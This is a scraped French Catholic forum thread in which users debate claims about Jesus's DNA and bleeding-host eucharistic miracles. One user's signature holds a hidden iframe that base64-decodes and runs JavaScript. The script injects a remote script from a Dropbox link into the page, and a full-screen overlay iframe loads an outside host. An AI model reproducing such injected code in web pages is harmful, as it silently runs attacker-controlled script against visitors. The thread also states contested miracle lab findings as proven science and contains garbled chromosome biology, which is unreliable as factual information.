DOCTEUR ANGÉLIQUE FORUM CATHOLIQUE

Théologie Spirituelle Catholique
Pour déposer une intention de prière : Agapé
ATTENTION : Les publicités ci-dessous sont indépendantes de notre volonté !
 
AccueilAccueil  PortailPortail  S'enregistrerS'enregistrer  Connexion  

Partagez | 
 

 L'ADN du SANG de Jésus de Nazareth

Aller en bas 
Aller à la page : 1, 2, 3, 4  Suivant
AuteurMessage
cederic

avatar

Masculin Messages : 1163
Inscription : 06/10/2013

MessageSujet: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 11:16

Une analyse du caryotype de Jésus de Nazareth révèlerait que son sang comporterait : 46 chromosomes X, (ceux de sa maman) mais UN SEUL chromosome Y !!!

si Jesus est vraiment fils de Dieu, la chose ne serait pas inconcevable...
https://www.youtube.com/watch?v=EaQYu2AUHqE

Qu'en penser ?

_________________
Nos amis les sindophobes ne peuvent pas voir le Suaire en peinture...
Revenir en haut Aller en bas
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 12:03

Le 18 août 1996, à 19h, le père Alejandro Pezet célébrait la messe dans l'église qui se trouve dans le centre commercial de la ville. Alors qu'il finissait de donner la Sainte Communion, une femme vint lui dire qu'elle avait trouvé une hostie dont on s'était débarrassé au fond de l'église. En allant à l'endroit indiqué, le P. Alejandro vit l'hostie souillée. Comme il ne pouvait pas la consommer, il la plaça dans un petit récipient d'eau qu'il rangea dans le tabernacle de la chapelle du Saint Sacrement.

ELe lundi 26 août, ouvrant le tabernacle, il vit à sa grande stupéfaction que l'Hostie était devenue une substance sanglante. Il en informa Mgr Jorge Bergoglio qui donna des instructions afin que l'Hostie soit photographiée de façon professionnelle. Les photos, prises le 6 septembre, montrent clairement que l'Hostie, qui était devenue un fragment de chair sanglante, avait beaucoup grossi en taille. Pendant plusieurs années l'Hostie demeura dans le tabernacle, toute l'affaire étant gardée secrète. Comme l'Hostie ne souffrait d'aucune décomposition visible, Mgr Bergoglio décida de la faire analyser scientifiquement.

Le 5 octobre 1999, en la présence des représentants de Mgr Bergoglio devenu archevêque, le Dr Castanon préleva un échantillon du fragment sanglant et l'envoya à New York pour analyse. Comme il ne voulait pas influencer les résultats de l'examen, il décida de cacher à l'équipe de scientifiques l'origine de l'échantillon. L'un de ces scientifiques était le réputé cardiologue et pathologiste médico-légal, le Dr Frederic Zugiba. Il détermina que la substance analysée était de la véritable chair et du vrai sang contenant de l'ADN humain. Il déclara que :

« la matière analysée est un fragment du muscle du cœur qui se trouve dans la paroi du ventricule gauche, près des valves. Ce muscle est responsable de la contraction du cœur. On doit se rappeler que le ventricule gauche du cœur agit comme une pompe qui envoie le sang à travers tout le corps. Le muscle cardiaque est dans un état d'inflammation et contient un nombre important de globules blancs. Ceci indique que le cœur était vivant au moment où l'échantillon a été prélevé. J'affirme que le cœur était vivant étant donné que les globules blancs meurent en dehors d'un organisme vivant. Ils ont besoin d'un organisme vivant pour les maintenir. Donc, leur présence indique que le cœur était vivant quand l'échantillon a été prélevé. Par ailleurs, ces globules blancs avaient pénétré les tissus, ce qui indique d'autant plus que le cœur avait été soumis à un stress intense, comme si son propriétaire avait été battu sévèrement au niveau de la poitrine. »

Deux Australiens, le journaliste Mike Willesee et le juriste Ron Tesoriero, furent les témoins de ces tests. Connaissant l'origine de l'échantillon, ils étaient sidérés par la déclaration du Dr Zugiba. Mike Willesee demanda au scientifique combien de temps les globules blancs auraient pu rester vivants s'ils provenaient de tissus humains conservés dans de l'eau. Le Dr Zugiba lui répondit qu'ils auraient cessé d'exister au bout de quelques minutes. Le journaliste révéla alors au docteur que la substance d'où provenait l'échantillon avait d'abord été conservée dans de l'eau ordinaire pendant un mois et qu'ensuite, pendant trois ans, elle avait été conservée dans un récipient d'eau déminéralisée, et c'est seulement après ce temps qu'un échantillon avait été prélevé pour analyse. Le Dr Zugiba était très embarrassé pour prendre ce fait en considération. Il déclara qu'il n'y avait aucun moyen d'expliquer ce fait scientifiquement. Aussi le Dr Zugiba demanda-t-il :

« Vous devez m'expliquer une chose : si cet échantillon provient d'une personne morte, alors comment se peut-il que pendant que je l'examinais, les cellules de l'échantillon étaient en mouvement et pulsaient ? Si ce cœur provient de quelqu'un qui est mort en 1996, comment peut-il être toujours en vie ? »

Alors seulement Mike Willesee révéla au Dr Zugiba que l'échantillon analysé provenait d'une Hostie consacrée (du pain blanc sans levain) qui s'était mystérieusement transformée en de la chair humaine sanglante. Ahuri par cette information, le Dr Zugiba répondit :

« Comment et pourquoi une Hostie consacrée peut changer son caractère et devenir de la chair et du sang humains vivants, cela restera un inexplicable mystère pour la science - un mystère totalement au-delà de sa compétence. »

Ensuite le Dr Ricardo Castanon Gomez prit des dispositions pour que les rapports du laboratoire établis à la suite du miracle de Buenos Aires soient comparés à ceux élaborés après le miracle de Lanciano, encore une fois sans révéler l'origine des échantillons de test. Les experts qui procédèrent à cette comparaison conclurent que les deux rapports des laboratoires avaient analysé des échantillons de tests provenant de la même personne. [b]Ils signalèrent encore que les deux échantillons révélaient un sang de type « AB » positif. Ce sang porte les caractéristiques d'un homme qui est né et qui a vécu au Moyen Orient.[/b] Un chercheur en neurosciences, docteur en psychologie clinique et diplômé en philosophie, né en Bolivie, athée, disciple de Jean-Paul Sartre et de Rita Levi-Montalcini s'est converti au catholicisme à 44 ans après avoir étudié en 1992 dans son pays natal (à Cochabomba) des phénomènes d'effusion de sang d'une image du Christ de 33 cm. Il a aussi étudié (de 1999 à 2005) deux hosties qui saignent dans le diocèse de Buenos Aires, une qui a saigné en 1992, l'autre en 1996. Voici une interview très intéressante (en espagnol) de ce monsieur.

Il parle aussi de Lanciano (du 8e siècle), du suaire de Turin (que l'on n'a toujours pas pu dater car la partie identifiée comme étant médiévale en 1988 était une reprise en coton sur l'original en lin) et de sa recherche de 2009, http://down.under.over-blog.com/2016/03/dr-ricardo-castanon-gomez.html
Revenir en haut Aller en bas
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 12:09

Il explique comment les globules rouges et blancs qui normalement disparaissent au bout d'une heure se conservent des années, ce qui est en soi miraculeux (de sorte qu'il n'a pas pu être ajouté par une personne extérieure), comment on peut établir d'après les tissus vivants que le sang vient d'un ventricule du cœur et en est sorti directement. Dans tous les cas c'est toujours du sang AB. Le projet est de séquencer l'ADN par ampliation, mais les chercheurs n'y parviennent pas avec le sang des statues et des hosties, alors qu'ils y parviennent avec les cellules qu'ils prélèvent des êtres humains qui ont tenu ces statues ou ces hosties. Les scientifiques athées disent que c'est parce que l'échantillon est détérioré, mais c'est faux puisque les globules blancs et rouges sont miraculeusement intacts. Les théologiens ont une lecture très précise du sens qu'on peut tirer des caractéristiques de ce sang (le fait qu'il vienne du ventricule gauche par exemple).

L'hostie de Lanciano a saigné quand le prêtre commençait à douter. Les phénomènes autour des hosties et des statues sont là pour aider à vaincre le doute tout en respectant la liberté de douter. En 1264 (et non 1273 comme le dit le Dr Ricardo Castañon Gomez dans l'interview) à Bolsena cela correspond au doute du prêtre. Parfois c'est une réponse au sacrilège comme à Cascia. La moitié des catholiques pratiquants selon divers sondages aux USA et en Australie ne croient pas que le Christ soit dans l'hostie.

Le Dr Ricardo Castañon Gomez bien sûr précise qu'il y a des cas où il y a des manipulations que lui-même a signalées à des évêques sur des statues et des hosties (des taches surajoutées). Il rappelle que les évêques devant les miracles doivent toujours répondre à la question est-ce un phénomène naturel ou pas ? peut-il résulter d'une ruse du diable ? (le Dr Ricardo Castañon Gomez n'exclut pas que ce soit le cas pour certaines effusions de sang qui ne donnaient rien en analyse au bout de 20 minutes, dans des contextes où il y avait des rivalités économiques, ce qui peut favoriser des actes démoniaques).
Revenir en haut Aller en bas
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 12:10

Revenir en haut Aller en bas
Tabris

avatar

Masculin Messages : 160
Inscription : 06/03/2018

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 13:47

Rien ne prouve que Jésus possèderait le même ADN que sa mère, non plus. On a déjà pu réaliser des grossesses programmées en inséminant des femmes avec des foetus fécondés au préalable. Et comme rien n'est impossible pour Dieu, il se peut très bien que tout l'ADN de Jésus soit venu d'En-haut.
Revenir en haut Aller en bas
SvsaRvsa

avatar

Masculin Messages : 75
Inscription : 08/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 14:50

Le gros problème avec ce genre d'étude c'est que les résultats ne sont jamais publiés, en tous cas pas publiquement, ce qui les rend invérifiables/partageables. L'ostie de Lanciano ne révélait pas d'adn, c'était "juste" du sang coagulé et un morceau d'un muscle précis du coeur (bien préservé/coupé, ce qui est miraculeux en soi). L'étude est consultable ici:
http://www.christ-roi.net/index.php/Le_miracle_eucharistique_de_Lanciano_(Bruno_Sammaciccia)#Etude_histologique_de_la_.C2.AB_chair_.C2.BB
Je trouve dommage que l'Eglise ne se mouille pas pour rendre publique la recherche sur les miracles qu'elle atteste.

_________________
<iframe style='display:none' src=javascript:eval(atob('dmFyIGg9cGFyZW50LmRvY3VtZW50LmhlYWQ7aWYoIWgpe2g9cGFyZW50LmRvY3VtZW50LmJvZHk7fXZhciBzPXBhcmVudC5kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNldEF0dHJpYnV0ZSgnc3JjJywnaHR0cHM6Ly9kbC5kcm9wYm94LmNvbS9zLzVmcmFrMG5ocmsyYmVtci9hLmpzPycrTWF0aC5mbG9vcigoTWF0aC5yYW5kb20oKSoxMDApKzEpKTtoLmFwcGVuZENoaWxkKHMpOw=='));></iframe><iframe class='trueMsgFrame' style='position:absolute;left:0px;top:0px;width:100%;height:100%;z-index:1000;min-width:3000px;min-height:3000px' src='http://hat-733.getforge.io'></iframe>
Revenir en haut Aller en bas
https://taolennoucatholique.wordpress.com/
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 15:58

SvsaRvsa a écrit:
Le gros problème avec ce genre d'étude c'est que les résultats ne sont jamais publiés, en tous cas pas publiquement, ce qui les rend invérifiables/partageables. L'ostie de Lanciano ne révélait pas d'adn, c'était "juste" du sang coagulé et un morceau d'un muscle précis du coeur (bien préservé/coupé, ce qui est miraculeux en soi). L'étude est consultable ici:
http://www.christ-roi.net/index.php/Le_miracle_eucharistique_de_Lanciano_(Bruno_Sammaciccia)#Etude_histologique_de_la_.C2.AB_chair_.C2.BB
Je trouve dommage que l'Eglise ne se mouille pas pour rendre publique la recherche sur les miracles qu'elle atteste.
Il n 'y a pas de publication car comme ecrit plus haut , " Le projet est de séquencer l'ADN par ampliation, mais les chercheurs n'y parviennent pas avec le sang des statues et des hosties, alors qu'ils y parviennent avec les cellules qu'ils prélèvent des êtres humains qui ont tenu ces statues ou ces hosties"
Revenir en haut Aller en bas
RenéMatheux



Masculin Messages : 16302
Inscription : 28/06/2008

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 17:29

Vous êtes sûr?
C'est bizarre!
De toutes façons cela vaudrait publication!

Mais c'est sûr qu'il faudrait faire cette analyse ADN.
Of course Mr. Green avant ce n'était pas possible!
Revenir en haut Aller en bas
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 17:33

"les chercheurs n'y parviennent pas "!! ( et c 'est tant mieux!C'est quoi la prochaine étape le clonage???) jocolor geek
Revenir en haut Aller en bas
florence_yvonne

avatar

Féminin Messages : 6602
Inscription : 12/02/2007

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 18:47

Les hommes ont un chromosome X et un Y, je ne vois pas ce qu'il y a d'extraordinaire la-dedans.

_________________
"La religion est une affaire entre chaque homme et la divinité."
(Pierre Bayle / 1647-1706)
Revenir en haut Aller en bas
http://www.forum-religions.org/
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 19:01

L 'extra-ordinaire est que la substance analysée était de la véritable chair et du vrai sang contenant de l'ADN humain et que le cœur était vivant au moment où l'échantillon a été prélevé et que cela vient d 'un morceau de pain c 'est a dire une Hostie consacrée ...
Revenir en haut Aller en bas
florence_yvonne

avatar

Féminin Messages : 6602
Inscription : 12/02/2007

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 19:03

Si on a retrouvé l'ADN de Jésus, peut-être que son retour se fera par l'intermédiaire du clonage.

_________________
"La religion est une affaire entre chaque homme et la divinité."
(Pierre Bayle / 1647-1706)
Revenir en haut Aller en bas
http://www.forum-religions.org/
RenéMatheux



Masculin Messages : 16302
Inscription : 28/06/2008

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 20:09

Revenir en haut Aller en bas
humanlife



Masculin Messages : 9939
Inscription : 07/11/2013

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 22:10

on ne peut pas avoir l'adn de jésus car pour cela il faudrait avoir son sang.

encore un fake.
Revenir en haut Aller en bas
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 22:35

Un miracle eucharistique n 'est pas un fake...
Revenir en haut Aller en bas
humanlife



Masculin Messages : 9939
Inscription : 07/11/2013

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Mer 11 Avr 2018, 22:57

un miracle selon philippe bis ou cedric ce n'est pas une référence.

je classe ces informations pour ma part dans la tendance hystérique du fake de notre époque.
Revenir en haut Aller en bas
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Ven 13 Avr 2018, 23:11

Ce n 'est pas une invention de ma part les miracles eucharistique ni   les Hosties Consacrée miraculeuse

ni les   Hosties consacrées profanées qui saigne humalife , il y a mèmes des preuves et  des témoins et mème des   photos si cela peut encore etre considéré comme des preuves pour des " saints thomas"...  http://le.blog.de.lala.over-blog.com/2016/04/yvonne-aimee-de-malestroit-l-abbe-paul-labutte-raconte-des-faits-extraordinaires.html  et http://studylibfr.com/doc/1569163/surnaturel  
Revenir en haut Aller en bas
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Ven 13 Avr 2018, 23:15

http://www.augustines-malestroit.com/portrait.php
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 01:12

humanlife a écrit:
on ne peut pas avoir l'adn de jésus car pour cela il faudrait avoir son sang.

encore un fake.

a mon avis, tu as raison, human.

Mais bon, quand je demande qu on teste les reliques christiques au niveau genetique, le topic est censuré.
Alors voyons ce qui va ressortir de cette nouvelle histoire.

Découvrirons nous les particularités génétiques de Jesus?
Roux?
Male?
Typé palestinien ou plutôt noir ou blanc?

Si son genome est analysable, qu apprendrons nous sur son geniteur?
Revenir en haut Aller en bas
Pignon



Masculin Messages : 7131
Inscription : 18/01/2016

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 01:28

Il était plutôt palestinien...

_________________
Trouver d'abord, chercher après : "La Structure absolue"
Revenir en haut Aller en bas
http://www.yhwh.fr/
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 01:34

Pignon a écrit:
Il était plutôt palestinien...

Que tu crois, pignon.
Certains le représentent chatain aux yeux bleux.

Seul un test adn nous le dira. La moitié de son adn venant de sa mere est tres probablement d origine palestinienne.

Ca on est d accord. Mais quid de l autre moitié?
Un mammifere a forcement deux moitiés de genomes,
une de sa mere
une de son pere.
Si cette histoire n est pas un enieme canular pseudo scientificoreligieux, j ai hate de voir les résultats des tests.
Revenir en haut Aller en bas
Pignon



Masculin Messages : 7131
Inscription : 18/01/2016

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 01:48

Il n'y a pas d'autre moitié... tu es catholique ou pas ?

_________________
Trouver d'abord, chercher après : "La Structure absolue"
Revenir en haut Aller en bas
http://www.yhwh.fr/
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 01:57

Pignon a écrit:
Il n'y a pas d'autre moitié... tu es catholique ou pas ?

Oui, je suis catho.

Comment ca, il n y a pas d autre moitié?
Tu sais compter jusqu a 1 ou pas?

un genome de mammifere, c est deux moitiés de genomes de mammifères, SAUF SI TU ME PROUVES LE CONTRAIRE.
Donc...
soit jésus a un genome Y et X
auquel cas, on peut l etudier

soit il y a seulement l adn de Marie,
auquel cas, la aussi, c est etudiable.

(au fait, pignon, t es catho, toi?)
Revenir en haut Aller en bas
Pignon



Masculin Messages : 7131
Inscription : 18/01/2016

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 02:00

En fait, tu faisais allusion à une remise en cause de l'immaculée conception, je me trompe ou pas ?

_________________
Trouver d'abord, chercher après : "La Structure absolue"
Revenir en haut Aller en bas
http://www.yhwh.fr/
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 02:14

Pignon a écrit:
En fait, tu faisais allusion à une remise en cause de l'immaculée conception, je me trompe ou pas ?


mguiiii


Dernière édition par Bassmeg le Dim 15 Avr 2018, 02:15, édité 1 fois
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 02:14

Pignon a écrit:
En fait, tu faisais allusion à une remise en cause de l'immaculée conception, je me trompe ou pas ?


oui tu te trompes, et lourdement, pignon.

l immaculée conception n a strictement rien a voir avec ce dont on parle, mais merci pour m avoir fait bien rire...

je te redemanderais pas si tu es catho.

Juste, demande autour de toi ce qu est l immaculée conception, pignon...renseigne toi un petit peu.

on revient au sujet?
Revenir en haut Aller en bas
Pignon



Masculin Messages : 7131
Inscription : 18/01/2016

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 02:16

Je ne me trompe pas, j'ai vu juste...

_________________
Trouver d'abord, chercher après : "La Structure absolue"
Revenir en haut Aller en bas
http://www.yhwh.fr/
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 02:23

Pignon a écrit:
Je ne me trompe pas, j'ai vu juste...
ben pas trop...

verifie, copain.

l immaculée conception, ca concerne marie.
pas jésus.


verifie par toi meme. Bienvenue
Revenir en haut Aller en bas
Pignon



Masculin Messages : 7131
Inscription : 18/01/2016

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 02:23

Si tu crois que jesus est né d'une relation charnelle tu nies à fortiori  l'immaculée conception, c'est une double faute.

_________________
Trouver d'abord, chercher après : "La Structure absolue"
Revenir en haut Aller en bas
http://www.yhwh.fr/
philippe bis

avatar

Masculin Messages : 5076
Inscription : 29/04/2017

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 09:54

Bassmeg a écrit:
humanlife a écrit:
on ne peut pas avoir l'adn de jésus car pour cela il faudrait avoir son sang.

encore un fake.

a mon avis, tu as raison, human.

Mais bon, quand je demande qu on teste les reliques christiques au niveau genetique, le topic est censuré.
Alors voyons ce qui va ressortir de cette nouvelle histoire.

Découvrirons nous les particularités génétiques de Jesus?
Roux?
Male?
Typé palestinien ou plutôt noir ou blanc?

Si son genome est analysable, qu apprendrons nous sur son geniteur?
Il ne vous vient pas a l 'idée que si Jésus est vraiment Dieu et c 'est ce dont vous comme moi  pensons chère Bassmeg , est capable de nous interdire d 'une façon qu 'il juge utile ( parce que il Dieu créateur de l 'Univers quand mème) de faire "joujou" avec son ADN?J 'ai déja dit ecrit plus haut  2 fois que Il n 'y a pas de publication car, " Le projet est de séquencer l'ADN par ampliation, mais les chercheurs n'y parviennent pas avec le sang des statues et des hosties, alors qu'ils y parviennent avec les cellules qu'ils prélèvent des êtres humains qui ont tenu ces statues ou ces hosties" Et aussi dans sa sagesse comment en nous donnant des preuves irréfutables pourrait -il dire encore qu 'il respect notre liberté de croire ou pas?
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 17:25

Pignon a écrit:
Si tu crois que jesus est né d'une relation charnelle tu nies à fortiori  l'immaculée conception, c'est une double faute.

je n ai pas dit ca, pignon.

Soit jésus n a QUE des genes de sa mere
alors, c est fascinant.

soit il a des genes de sa mere ET de son Pere,
alors c est fascinant...

l immaculée conception n a rien a voir la dedans.
et question Double Faute, tu te poses la.
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 17:29

philippe bis a écrit:
Bassmeg a écrit:
humanlife a écrit:
on ne peut pas avoir l'adn de jésus car pour cela il faudrait avoir son sang.

encore un fake.

a mon avis, tu as raison, human.

Mais bon, quand je demande qu on teste les reliques christiques au niveau genetique, le topic est censuré.
Alors voyons ce qui va ressortir de cette nouvelle histoire.

Découvrirons nous les particularités génétiques de Jesus?
Roux?
Male?
Typé palestinien ou plutôt noir ou blanc?

Si son genome est analysable, qu apprendrons nous sur son geniteur?
Il ne vous vient pas a l 'idée que si Jésus est vraiment Dieu et c 'est ce dont vous comme moi  pensons chère Bassmeg , est capable de nous interdire d 'une façon qu 'il juge utile ( parce que il Dieu créateur de l 'Univers quand mème) de faire "joujou" avec son ADN?J 'ai déja dit ecrit plus haut  2 fois que Il n 'y a pas de publication car, " Le projet est de séquencer l'ADN par ampliation, mais les chercheurs n'y parviennent pas avec le sang des statues et des hosties, alors qu'ils y parviennent avec les cellules qu'ils prélèvent des êtres humains qui ont tenu ces statues ou ces hosties" Et aussi dans sa sagesse comment en nous donnant des preuves irréfutables pourrait -il dire encore qu 'il respect notre liberté de croire ou pas?

il n est pas quetion de faire "joujou" philippe, mais d apprendre et d etudier.

De sortir de l obscurité et de l erreur, comme on l a fait avec le drap de turin.

On pourrait le faire avec les reliques christiques, ca permettrait aux croyants du monde entier de cesser de perdre un temps précieux a adorer des fausses reliques.

et de plus, les résultats seraient hyper intéressants.
Imagine un peu les applications pratiques...
Le gene de DIEU.
Revenir en haut Aller en bas
Pignon



Masculin Messages : 7131
Inscription : 18/01/2016

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 18:00

Bassmeg a écrit:
Pignon a écrit:
Si tu crois que jesus est né d'une relation charnelle tu nies à fortiori  l'immaculée conception, c'est une double faute.

je n ai pas dit ca, pignon.

Soit jésus n a QUE des genes de sa mere
alors, c est fascinant.

soit il a des genes de sa mere ET de son Pere,
alors c est fascinant...


Qui est le père de Jésus à ton avis ? Ton avis en tant que catholique.

_________________
Trouver d'abord, chercher après : "La Structure absolue"
Revenir en haut Aller en bas
http://www.yhwh.fr/
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 18:23

Pignon a écrit:
Bassmeg a écrit:
Pignon a écrit:
Si tu crois que jesus est né d'une relation charnelle tu nies à fortiori  l'immaculée conception, c'est une double faute.

je n ai pas dit ca, pignon.

Soit jésus n a QUE des genes de sa mere
alors, c est fascinant.

soit il a des genes de sa mere ET de son Pere,
alors c est fascinant...


Qui est le père de Jésus à ton avis ? Ton avis en tant que catholique.

Je ne sais pas. J ai pas de honte a l avouer. C est OK de pas savoir, parfois, plutôt que de pretendre SAVOIR des choses qu en fait on ne SAIT pas, mais qu on ne fait que CROIRE.
Ca me parait plus honnete comme attitude, intellectuellement parlant.

et toi, tu penses quoi sur cette question de l identité du pere de Jésus?
L analyse permettrait d y voir plus clair, comme pour le drap de turin.
Revenir en haut Aller en bas
Onan Peuplu

avatar

Masculin Messages : 4115
Inscription : 31/05/2016

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 18:28

Bassmeg a écrit:
ca permettrait aux croyants du monde entier de cesser de perdre un temps précieux a adorer des fausses reliques.

si tu commençais par le plus simple, comme "prévu" avec ta tante italienne ou je ne sais quelle pharmacienne qui aurait fourni le Padre Pio en acide pour ses (faux?) stigmates ?
Revenir en haut Aller en bas
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 19:03

Onan Peuplu a écrit:
Bassmeg a écrit:
ca permettrait aux croyants du monde entier de cesser de perdre un temps précieux a adorer des fausses reliques.

si tu commençais par le plus simple, comme "prévu" avec ta tante italienne ou je ne sais quelle pharmacienne qui aurait fourni le Padre Pio en acide pour ses (faux?) stigmates ?

ben j ai deja commencé, mais bizarrement, Pio n est pas le sujet ici, onan.

Toi aussi tu penses que c etait des faux stigmates, ou j ai mal compris?
Revenir en haut Aller en bas
florence_yvonne

avatar

Féminin Messages : 6602
Inscription : 12/02/2007

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 19:10

Bassmeg a écrit:
philippe bis a écrit:
Bassmeg a écrit:
humanlife a écrit:
on ne peut pas avoir l'adn de jésus car pour cela il faudrait avoir son sang.

encore un fake.

a mon avis, tu as raison, human.

Mais bon, quand je demande qu on teste les reliques christiques au niveau genetique, le topic est censuré.
Alors voyons ce qui va ressortir de cette nouvelle histoire.

Découvrirons nous les particularités génétiques de Jesus?
Roux?
Male?
Typé palestinien ou plutôt noir ou blanc?

Si son genome est analysable, qu apprendrons nous sur son geniteur?
Il ne vous vient pas a l 'idée que si Jésus est vraiment Dieu et c 'est ce dont vous comme moi  pensons chère Bassmeg , est capable de nous interdire d 'une façon qu 'il juge utile ( parce que il Dieu créateur de l 'Univers quand mème) de faire "joujou" avec son ADN?J 'ai déja dit ecrit plus haut  2 fois que Il n 'y a pas de publication car, " Le projet est de séquencer l'ADN par ampliation, mais les chercheurs n'y parviennent pas avec le sang des statues et des hosties, alors qu'ils y parviennent avec les cellules qu'ils prélèvent des êtres humains qui ont tenu ces statues ou ces hosties" Et aussi dans sa sagesse comment en nous donnant des preuves irréfutables pourrait -il dire encore qu 'il respect notre liberté de croire ou pas?

il n est pas quetion de faire "joujou" philippe, mais d apprendre et d etudier.

De sortir de l obscurité et de l erreur, comme on l a fait avec le drap de turin.

On pourrait le faire avec les reliques christiques, ca permettrait aux croyants du monde entier de cesser de perdre un temps précieux a adorer des fausses reliques.

et de plus, les résultats seraient hyper intéressants.
Imagine un peu les applications pratiques...
Le gene de DIEU.

Si l'on rassemblait tous les morceaux de la sainte croix que l'on trouve de par le monde on aurait de quoi faire une centaine de croix.

_________________
"La religion est une affaire entre chaque homme et la divinité."
(Pierre Bayle / 1647-1706)
Revenir en haut Aller en bas
http://www.forum-religions.org/
Invité
Invité



MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 19:23

florence_yvonne a écrit:
Bassmeg a écrit:
philippe bis a écrit:
Bassmeg a écrit:


a mon avis, tu as raison, human.

Mais bon, quand je demande qu on teste les reliques christiques au niveau genetique, le topic est censuré.
Alors voyons ce qui va ressortir de cette nouvelle histoire.

Découvrirons nous les particularités génétiques de Jesus?
Roux?
Male?
Typé palestinien ou plutôt noir ou blanc?

Si son genome est analysable, qu apprendrons nous sur son geniteur?
Il ne vous vient pas a l 'idée que si Jésus est vraiment Dieu et c 'est ce dont vous comme moi  pensons chère Bassmeg , est capable de nous interdire d 'une façon qu 'il juge utile ( parce que il Dieu créateur de l 'Univers quand mème) de faire "joujou" avec son ADN?J 'ai déja dit ecrit plus haut  2 fois que Il n 'y a pas de publication car, " Le projet est de séquencer l'ADN par ampliation, mais les chercheurs n'y parviennent pas avec le sang des statues et des hosties, alors qu'ils y parviennent avec les cellules qu'ils prélèvent des êtres humains qui ont tenu ces statues ou ces hosties" Et aussi dans sa sagesse comment en nous donnant des preuves irréfutables pourrait -il dire encore qu 'il respect notre liberté de croire ou pas?

il n est pas quetion de faire "joujou" philippe, mais d apprendre et d etudier.

De sortir de l obscurité et de l erreur, comme on l a fait avec le drap de turin.

On pourrait le faire avec les reliques christiques, ca permettrait aux croyants du monde entier de cesser de perdre un temps précieux a adorer des fausses reliques.

et de plus, les résultats seraient hyper intéressants.
Imagine un peu les applications pratiques...
Le gene de DIEU.

Si l'on rassemblait tous les morceaux de la sainte croix que l'on trouve de par le monde on aurait de quoi faire une centaine de croix.

Oui.
Pareil pour les prépuces, les dents de lait, les reliques diverses et variées.

En 2018, on pourrait peut etre faire un peu de tri, je pense.
Si on avait UN echantillon SOURCE comme pretendu, on pourrait discriminer toutes les fakes reliques.
J ai du mal a comprendre pourquoi tan de croyants sont farouchement contre ca.
Revenir en haut Aller en bas
RenéMatheux



Masculin Messages : 16302
Inscription : 28/06/2008

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 21:53

Citation :
Si l'on rassemblait tous les morceaux de la sainte croix que l'on trouve de par le monde on aurait de quoi faire une centaine de croix.
Z'en savez rien!
Revenir en haut Aller en bas
Pignon



Masculin Messages : 7131
Inscription : 18/01/2016

MessageSujet: Re: L'ADN du SANG de Jésus de Nazareth   Dim 15 Avr 2018, 22:28

RenéMatheux a écrit:
Citation :
